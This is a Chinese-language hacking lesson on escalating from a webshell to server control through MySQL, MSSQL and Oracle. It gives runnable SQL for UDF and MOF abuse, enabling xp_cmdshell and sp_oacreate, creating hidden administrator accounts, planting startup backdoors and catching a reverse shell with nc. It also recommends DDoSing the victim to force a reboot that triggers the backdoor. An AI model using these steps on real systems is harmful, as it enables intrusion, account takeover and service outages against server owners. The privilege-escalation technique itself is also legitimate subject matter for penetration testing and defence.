60 权限提升-MY&MS&ORA等SQL数据库提权

数据库提权在web和本地环境都能提权，它的核心是得到数据库的账号密码，也就是说你在web环境和本地环境，都能得到账号密码，都是可以尝试进行数据库提权的，上篇文章写的是借助系统层面的漏洞提权，这次讲的是借助服务器上数据库的一些东西

今天讲的是提权方法里面的数据库提权，也会包括数据库权限的获取

在利用系统溢出漏洞无果的情况下，可以采用数据库进行提权，但需要知道数据库提权的前提条件: 服务器开启数据库服务及获取到最高权限用户密码。除Access数据库外，其他数据库基本都存在数据库提权的可能。

数据库应用提权在权限提升中的意义

数据库提权不是建立在漏洞层面的提权方式，它是在漏洞没有办法的前提下采取数据库，因为数据库在服务器上的搭建是很常见的，很多服务器都有安装相关的服务

WEB或本地环境如何探针数据库应用

数据库提权只要得到数据库的账号密码就可以提权，所以在本地或web权限下面，都是可以进行的
我们先要进行探针，判断它有数据库的相关服务，我们可以利用端口扫描，通过命令看一下有没有开启相关的命令服务，或者其它方式，通过浏览一些文件和文件夹来判定它是否有安装相关数据库，只要判定出有对应的数据库之后，就可以进行添加

数据库提权权限用户密码收集等方法

收集主要是针对数据库的权限密码，寻找方式通过配置文件来获取数据库的账号密码，通过数据库的储存文件，将数据库的储存文件进行下载，然后进行还原里面的账号密码，通过相关的爆破脚本和工具，来进行密码的猜解，第四步就是用其它方式，一般我们在提权里面用配置文件和存储文件两种，第一种是最常见的，也是使用最广泛的，直接从相关的配置文件里面去得到账号密码

目前数据库提权对应的技术及方法等

前两步做到之后，我们就要进行分类，我们要把每个数据库提权方法和相关攻击过程有个大概的了解和操作，比如Mysql、mssql和oracle三个数据库的提权方式

演示案例

Mysql数据库提权演示-脚本&MSF

php加mysql的搭建组合，我们讲的权限提升是你的权限已经得到了，就是个webshell权限，根据这个webshell权限提升到服务器权限，那么借助的就是数据库提权，我们先进入到后门里面去，然后后面我们就尝试用这个后门进行提权


我们进去之后第一步就是服务探针，看一下有没有相关的数据库，然后这里可以进行命令的执行，或者通过端口扫描，把一些常见的端口进行扫描，oracle1521，sqlserver 1433，mysql 3306，pointbase 9092，DB2 5000，mongodb 27017，redis 6379，memcacheed 11211，可以判定出数据库在上面是否安装

这里很显然就是mysql，mysql重点的提权方式是udf，后面三种都是在udf失效的情况下选中的一个方式

mysql数据库在安装之后，成功继承系统权限，那么你取得mysql最高权限，root账号密码，mysql最高权限账号用户名是root，密码是自己设定的，你通过得到账号密码之后，建立mysql最高权限，调用dll文件执行命令、函数来实现对系统命令的调用执行，就是借助数据库自身的应用来调用系统命令，从而实现提权

信息收集就是收集数据库当前的用户名和密码，因为Mysql最高权限用户名是root，所以密码需要我们自己去找

流程: 服务探针-信息收集-提权利用-获取权限

1.UDF提权知识点: (基于MYSQL调用命令执行函数）

读取网站数据库配置文件 (了解其命名规则及查找技巧)
sql data inc config conn database common include等
通过关键字判定，来确定存放账号密码配置信息的文件


这种方法是最常见的，最实用的，直接通过网站数据库的配置文件来获取的一种方式，主要是看网站源码的结果，通过命名的关键字，来判定是否是数据库的配置文件

如果在实战情况下面，我们会发现一个问题，你即使在数据库配置文件下面，打开之后，你会发现这个账号密码不是root，他这边可以把root进行修改，他可以用普通用户去修改这里，账号密码是普通用户，不是root，遇到这种情况可以选用下面的方法，就是我们要找到root账号密码才行，账号是root，密码任意

读取数据库存储或备份文件 (了解其数据库存储格式及对应内容)

@@basedir/data/数据库名/表名.myd
mysql数据库安装目录下面有个data，data目录下面有很多文件夹，然后每个文件夹下面有对应的三个文件，格式后缀跟它一样，每个文件夹对应的就是表，相当于你在数据库里面创建一个表，对应的就会产生一个表，并且数据和列名都会在这个文件里面，myd格式对应就会储存表里面的内容



myd文件就是用来储存数据的地方，文件夹的名字对应的就是数据库的名字

mysql数据库的密码是在mysql下的user，我们mysql下的root密码、数据库的管理员、数据库的用户密码，它是储存在mysql数据库下的user表，其中root就在这里，这个加密值可以直接放在网上进行一个破解的


对应的，我要找到数据，可以通过下载对应文件来获取myd里面的内容，来获取用户名账号密码，mysql文件夹，找对应的user.mvd

通过第二种方式直接找到数据库安装下面对应的user.mvd进行下载或者在线编辑进行查看，得到里面的账号密码，这是mysql的特性

利用脚本暴力猜解 (了解数据库是否支持外联及如何开启外联）

远程本地暴力猜解，服务器本地暴力猜解

暴力破解本身就是靠运气的东西，所以这个方式是以上两种方式不行的时候，选择的一种方式
一般mysql数据库里面root用户默认是不支持外联的，就是说你要采取root进行连接，他只支持本地连接，就是本机连接本机，不允许从外部进行连接这台数据库，指的就是root账户密码的连接方式，如果你要采取root连接的话，他默认是不支持外联的

如果我们要进行暴力破解，那么一般我们暴力破解需要用到脚本进行暴力破解，我们知道很多工具爆破，但是这些工具是放在自己的电脑上面，我是客户端，对方是服务器，你和他的连接属于外部连接，那么你要爆破他的账号密码，一般我们爆破的是root账号密码，由于root是不支持外联的，我们的爆破是没有意义的，因为这个root首先就不支持账号密码的外连，无论你怎么爆破都不成功，这个时候，我们就要用到脚本暴力破解，就是通过网站后门把爆破脚本上传上去

由于他网站是php的，所以我要选择php的爆破脚本，把别人写好的php爆破脚本写进去，把他放到对方服务器里面执行，就是说把脚本上传到网站页面上去，才能爆破脚本，由于脚本是建立在网站自身的服务器上面连接的，这种连接就属于本地连接，如果用工具，你是没有权限把工具放到服务器上面，你这个爆破如果他不支持外联是没有任何意义的

爆破工具很多，msf里面也有爆破工具，把爆破脚本上传到目标服务器上去，然后访问这个地址，把IP地址写上去，爆破成功


脚本爆破就是解决不外联的情况
使用msf爆破，寻找mysql，选择登录的payload


设置一下目标主机和密码，然后执行

这是它支持外联的情况，如果不支持外联，那肯定是不可以的

利用自定义执行函数导出dll文件进行命令执行

select version() select @@basedir
手工创建plugin目录或利用NTFS流创建
select ‘x’ into dumpfile ‘目录/lib/plugin::INDEX_ALLOCATION’
1.mysql<5.1 导出目录c:/windows或system32
2.mysql=>5.1 导出安装目录/lib/plugin/

得到密码之后，我们就要进行提权利用，我们优先选择udf提权，我们要重视两个问题，第一个先把mysql的版本搞清楚，小于5.1的话，将udf导出的时候，要导出到c:/windows或system32目录，如果是大于5.1的版本，导出数据库的安装目录/lib/plugin/，Mysql初次安装默认是没有/plugin目录的，需要你自己通过webshell去创建这个目录，这个导出目录是windows和linux通用的

执行sql语句就可以知道mysql的版本，点击后门里面的工具，执行sql功能，把账号密码写进去，点击显示版本，执行

查看数据库的安装目录

创建目录
这个目录有了之后，就导出到这个目录

点击mysql提权，把目录记录下来并且复制上去，让他安装dll到上面去，你如果没有root账号，他是不能安装的，所以我们前提条件是要得到账号密码，没有这个账号密码，我们是没有权限导出dll文件的，点击安装

我们直接去webshell里面去浏览目录，看一下有没有dll文件，来判定他是否导出成功


导出成功之后，就可以通过调用执行相关的系统命令，比如添加用户账号密码，连接他的远程端口，来实现控制这台服务器，这个就是后续操作，就是创建个用户，然后添加为管理员者，连接3389远程端口，来控制这台windows远程服务器，如果是linux也差不多，连接他的ssh，所以这个就是udf提权

如果dll文件被调用成功之后，是不能删除的，如果能够删除，说明数据库上面有点问题，实战情况下面一般是导出就能用了

mysql数据库UDF提权，权限是administrator权限，不应该是system权限吗

这个是看mysql安装的时候，mysql如果是phpstudy软件安装的，不是我这个用户在网站下载的，所以它是administrator，它是phpstudy软件自带的mysql，提前已经打包好进去了，不是安装版本的

2.MOF知识点: (基于MYSQL特性的安全问题）

导出自定义mof文件到系统目录加载https://www.cnblogs.com/xishaonian/p/6384535.html

select load_file('C:/phpStudy/PHPTutorial/WWW/user_add.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';
1

mof提权是成功机率最低的一种，他有一些限制，不是很推荐大家的使用

失败的原因有很多种，关键目录写不到c:/windows/system32/下面，目录无法替换，第二种原因是各种各样的防护软件拦截，所以它的成功机率不是很高，而且他也是被动的提权，他需要等待时间，能不能成功说不准，这种提权是Mysql提权里面不推荐的一种

3.启动项知识点: (基于配合操作系统自启动)

导出自定义可执行文件到启动目录配合重启执行
将创建好的后门或执行文件进行服务器启动项写入，配合重启执行!

服务器操作系统在重启之后，会加载一些文件，这个文件我们称之为自启动文件，比如电脑启动之后，我们可以通过配置让它自动启动QQ、微信，同样的道理，我们的电脑上面有很多自启动项目，他通过Mysql权限，导出自定义的可执行文件，到启动目录，来配合服务器的重启，然后重启之后，会加载可执行文件，从而这个可加载文件一旦被执行，可执行文件可能是后门、执行的相关cmd命令、系统命令

寻找服务器上的启动目录

他就会在这里将你的后门，写到这个启动项里面，你服务器重启之后，就会加载这个文件，exe文件就会被执行，这个exe可以为一个后门，我们常说的cs后门，或者远程控制后门，简简单单的执行命令，搞个bat文件，服务器在重启之后，就会调用bat里面的命令，实现我们的操作。这个启动项，可以利用sql命令，也可以利用到相关命令

我们使用msf进行提权操作，要确保他的外联是开启状态，因为msf去攻击这台Mysql主机，如果你的数据库外联是没有开启的话，默认它的root是关闭的，我们拿到它root的密码之后，通过sql命令把外联开启，然后再用mysql进行启动项的提权

点击开启外联，把密码改一下，这条命令的意思是给予所有权限，来自任意IP，对应root用户，密码是root的
开启外联之后，我们就可以远程连接到mysql数据库

利用msf进行Mysql提权的时候，外联是一定要开的，开不了，msf进行攻击的时候，连都连接不上去，根本就无法进行提权


这就是类似一个后门，服务器重启之后，就会加载这个后门

利用ddos把对方的流量打光，流量攻击一旦把流量打光，流量崩溃了，服务器就会自动重启，因为它重启之后，文件被正常执行，后门就会被触发，远控木马直接被执行，这时候CS就可以上线

4.反弹知识点: (基于利用反弹特性命令执行)

nc -l -p 5577
1

我监听我本地的5577端口，这个时候借助反弹提权

创建反弹函数，创建完之后，执行

可以看到这里直接收到会话，来自命令终端的


内网中最常见的方式就是建立隧道和反弹，如果你没有一台外网主机的话，很多操作是会受到很大限制的

MSSQL数据库提权演示-MSSQL客户端

sqlserver是微软官方自带的数据库，只能在windows上应用，linux是没有的，这和它处理方式有关，因为sqlserver是微软的，它是windows特有产品，所以linux上没有

现在主流的是sqlserver2008和2012，还有2016的

案例: MSSQL数据库提权演示-MSSQL客户端

流程: 服务探针-信息收集-提权利用-获取权限

1.使用xp_cmdshell进行提权
xp_cmdshell默认在mssql2000中是开启的，在mssql2005之后的版本中则默认禁止。如果用户拥有管理员sa权限则可以用ep_configure重修开启它。

mysql最高权限是root，mssql最高权限是sa，sqlserver数据库和Mysql数据库有个最大的区别是mssql的sa密码一般是默认支持外联的，这个客户端你安装个mssql就有了，这是它官方的东西，你也可以用它网上连接的客户端也可以的，比如navicat，但是还是推荐大家用官方的会比较好一点


连接上去之后，我们首先看它有没有xp_cmdshell，点击系统数据库>master>可编程性>扩展存储过程>系统扩展存储过程

它其实就是借助sys.xp_cmdshell来执行命令的，但是有不代表它就能调用成功

点击新建查询
启用:

EXEC sp_configure 'show advanced options',1
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1;
RECONFIGURE;
1
2
3
4

关闭:

exec sp_configure 'show advanced options',1;
reconfigure;
exec sp_configure 'xp_cmdshell',0;
reconfigure;
1
2
3
4

执行:

EXEC master.dbo.xp_cmdshell '命令'
1

想执行什么命令就执行什么命令

如果xp_cmdshell被删除了，可以上传xplog70.dll进行恢复

exec master.sys.sp_addextendedproc 'xp_cmdshell','C:\Programfiles\Microsoft SQL Server\MssqI\Binn\xplog70.dll'
1

我们就看xp_cmdshell有没有开，有没有关，它关了，你就把它开了，然后你再执行命令就可以了

2.使用sp_oacreate进行提权

主要是用来调用OLE对象，其实就是自身数据库的特性，利用OLE对象的run方法执行系统命令。
启用:

EXEC sp_configure 'show advanced options',1;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'ole Automation Procedures',1;
RECONFIGURE WITH OVERRIDE;
1
2
3
4

关闭:

EXEC sp_configure 'show advanced options',1;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'ole Automation Procedures',0;
RECONFIGURE WITH OVERRIDE;
1
2
3
4

执行:

declare @shell int exec sp_oacreate 'wscript.shell',@shell output  exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c whoami >c:\\1.txt'
1

解决回显问题，因为执行之后，有些结果不给予回显，所以把结果写到服务器的那个盘符，然后你在通过webshell权限对这个结果进行返回读取，来看一下执行的结果

3.使用SQL Server 沙盒提权

前面两种是借助系统自身的组件，沙盒类似于虚拟机，模拟自身真实环境，我们在进行木马运行的时候，可以把它放到沙盒里面去运行

mssql自身有个沙盒，有个安全运行环境，我们可以借助任意环境来进行运行，在沙盒里面它是允许一些敏感的东西被运行，我们借助沙盒来执行一些敏感的东西，因为上述这些敏感的东西，都是可以调用命令执行的，所以它在高版本禁用它，就是为了安全性，但是又由于它自身又有沙盒，所以沙盒的存在意义，就是为一些高风险的操作，提供一个执行的环境，所以我们就可以利用沙盒来执行
参考资料: https://blog.51cto.com/11797152/2411770

exec sp_configure 'show advanced options',1;reconfigure;
-- 不开启的话在执行xp_regwrite会提示让我们开启
1
2

exec sp_configure 'Ad Hoc Distributed Queries',1;reconfigure;
--关闭沙盒模式，如果一次执行全部代码有问题，先执行上面两句代码。
1
2

exec master..xp_regwrite
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;
--查询是否正常关闭，经过测试发现沙盒模式无论是开，还是关，都不会影响我们执行下面的语句。
1
2
3

exec master.dbo.xp_regread
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode'
--执行系统命令select * from openrowset('microsoft.jet.oledb.4.0',';database=c:/windows/system32/ias/ias.mdb','select shell("net user margin margin /add”)') 
1
2
3

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:/windows/system32/ias/ias.mdb','select shell("net localqroup administratora margin /add")')
1

这些语句按照上面来就可以了，没必要懂这些原理，你知道怎么提权就可以
沙盒提权是建立在前面两种提权方式执行不了的情况下，进行的最终方案，沙盒提权能够解决sqlserver提权绝大部分的问题，一般前面两个操作不了的时候，在启用沙盒提权

沙盒模式SandBoxMode参数合义 (默认是2)
‘0’: 在任何所有者中禁止启用安全模式
‘1’: 为仅在允许范围内
‘2’: 必须在access模式下
‘3’: 完全开启
openrowset是可以通过OLE DB访问SQL Server数据库，OLE DB是应用程序链接到SQL Server的的驱动程序。
–恢复配置

--exec master..xp_regwrite
'HKEY_IOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','sandBoxMode','REG_DWORD',1;
--exec sp_configure 'Ad Hoc Distributed Queries',O;reconfigure;
1
2
3

Oracle数据库提权演示-自动化工具

普通用户模式:
前提是拥有一个普通的oracle连接账号，不需要DBA权限，可提权至DBA，并以oracle实例运行的权限执行操作系统命令。

DBA用户模式: (自动化工具演示)
拥有DBA账号密码，可以省去自己手动创建存储过程的繁琐步骤，一键执行测试。

注入提升模式: (sqlmap测试演示)
拥有一个oracle注入点，可以通过注入点直接执行系统命令，此种模式没有实现回显，需要自己验证。

oracle搭建的组合一般是jsp和java开发环境，如果是jsp的网站有后门，不需要提权，自带system权限，网站权限就是系统权限，这个是jsp本身脚本的继承性
这套jsp程序存在注入点，我们对注入点进行注入的时候

我们用sqlmap跑一下，判断一下系统是不是dba权限

可以看到确实是dba权限

这个是oracle提权工具，非常简单，方便

我们刚才在注入点已经判定是dba了，也就是说当前这个东西是dba权限，对应写上去，点击连接


利用这个工具直接提权，没有什么东西可讲，具体原理，可以网上查资料，我们讲的是方法

jsp网站、oracle搭建组合的特性，继承有系统权限，所以它不需要提权，直接连上去操作就完事了

oracle工具不支持post注入，那个工具主要是用来提权，注入是可以用sqlmap来解决的

mysql，mssql、oracle是目前比较主流的，你说的redis、DB2的确现在也有，但是还是mysql、mssql、oracle居多，很多以前的老企业是用mssql，后面用oracle的也多，mysql也有点份额，redis和其它的就是特殊应用里面才会有，它虽然说比其它数据库比较先进，但它是有特殊的网站应用，可能会用到这些数据库

涉及资源:

http://www.zzvips.com/article/79791.html
https://www.cnblogs.com/xishaonian/p/6384535.html
https://blog.51cto.com/u_11797152/2411770